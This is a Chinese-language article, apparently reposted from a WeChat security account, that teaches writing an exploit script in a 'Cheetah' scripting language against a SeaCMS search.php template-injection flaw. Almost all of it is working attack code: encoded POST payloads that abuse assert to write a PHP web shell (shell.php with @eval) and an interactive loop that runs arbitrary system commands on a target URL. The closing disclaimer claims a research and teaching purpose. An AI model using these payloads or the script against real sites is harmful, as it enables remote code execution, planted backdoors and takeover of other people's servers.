点击上方蓝字关注我们
1
漏洞分析
http://www.seacms1.com/search.phpPOST:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}searchtype=5&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=fwrite(fopen("shell.php","w"),'<?php @eval($_POST['test']); ?>')
searchtype=5&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=fwrite(fopen("shell.php","w"),'<?php @eval(fread(fopen("shell.txt","r"),filesize("shell.txt"))); ?>')
2
上传shell
#define getshellpayload = searchtype=5&order=%7D%7Bend%20if%7D%7Bif%3A1%29print%5Fr%28%24%5FPOST%5Bfunc%5D%28%24%5FPOST%5Bcmd%5D%29%29%3B%2F%2F%7D%7Bend%20if%7D&func=assert&cmd=fwrite%28fopen%28%22shell.php%22%2C%22w%22%29%2C%27%3C%3Fphp%20%40eval%28fread%28fopen%28%22shell.txt%22%2C%22r%22%29%2Cfilesize%28%22shell.txt%22%29%29%29%3B%20%3F%3E%27%29function GetShell(url){return HttpPost(url."/search.php",getshellpayload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");}
#define injectionTxtpayloadqian = searchtype=5&order=%7D%7Bend%20if%7D%7Bif%3A1%29print%5Fr%28%24%5FPOST%5Bfunc%5D%28%24%5FPOST%5Bcmd%5D%29%29%3B%2F%2F%7D%7Bend%20if%7D&func=assert&cmd=fwrite%28fopen%28%22shell.txt%22%2C%22w%22%29%2C%27system%28%22#define injectionTxtpayloadhou = %22%29%3B%27%29function injectionTxt(url,cmd){return HttpPost(url."/search.php",injectionTxtpayloadqian.URLEncode(cmd).injectionTxtpayloadhou,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");}3
查看结果
function GetRes(url){res = HttpGet(url."/shell.php","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");return res[0];}
4
执行逻辑
function main(args){ print("请输入要测试的URL:"); webUrl = input(); res = GetShell(webUrl); if(StrFindStr(res[1],"200 OK",0) == "-1"){ print("getshell失败"); return ""; } while(1 == 1){ print("请输入要执行的命令(输入exit退出)"); cmd = input(); if(cmd == "exit"){ break; } injectionTxt(webUrl,cmd); print(GetRes(webUrl)); }}5
完整代码
#define getshellpayload = searchtype=5&order=%7D%7Bend%20if%7D%7Bif%3A1%29print%5Fr%28%24%5FPOST%5Bfunc%5D%28%24%5FPOST%5Bcmd%5D%29%29%3B%2F%2F%7D%7Bend%20if%7D&func=assert&cmd=fwrite%28fopen%28%22shell.php%22%2C%22w%22%29%2C%27%3C%3Fphp%20%40eval%28fread%28fopen%28%22shell.txt%22%2C%22r%22%29%2Cfilesize%28%22shell.txt%22%29%29%29%3B%20%3F%3E%27%29#define injectionTxtpayloadqian = searchtype=5&order=%7D%7Bend%20if%7D%7Bif%3A1%29print%5Fr%28%24%5FPOST%5Bfunc%5D%28%24%5FPOST%5Bcmd%5D%29%29%3B%2F%2F%7D%7Bend%20if%7D&func=assert&cmd=fwrite%28fopen%28%22shell.txt%22%2C%22w%22%29%2C%27system%28%22#define injectionTxtpayloadhou = %22%29%3B%27%29function injectionTxt(url,cmd){return HttpPost(url."/search.php",injectionTxtpayloadqian.URLEncode(cmd).injectionTxtpayloadhou,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");}function GetShell(url){return HttpPost(url."/search.php",getshellpayload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");}function GetRes(url){res = HttpGet(url."/shell.php","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");return res[0];}function main(args){print("请输入要测试的URL:");webUrl = input();res = GetShell(webUrl);if(StrFindStr(res[1],"200 OK",0) == "-1"){print("getshell失败");return "";}while(1 == 1){print("请输入要执行的命令(输入exit退出)");cmd = input();if(cmd == "exit"){break;}injectionTxt(webUrl,cmd);print(GetRes(webUrl));}}
点击下面链接 查看历史文章【Cheetah语言】编写Apache-Sole最新任意文件读取漏洞EXP脚本
【Cheetah语言】使用Cheetah编写通达自动Getshell脚本 | 通达OA v11.7 在线用户登录漏洞复现
点亮 
,告诉大家你也在看
本文始发于微信公众号(云剑侠心):【Cheetah语言】Cheetah进行EXP脚本编写教程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论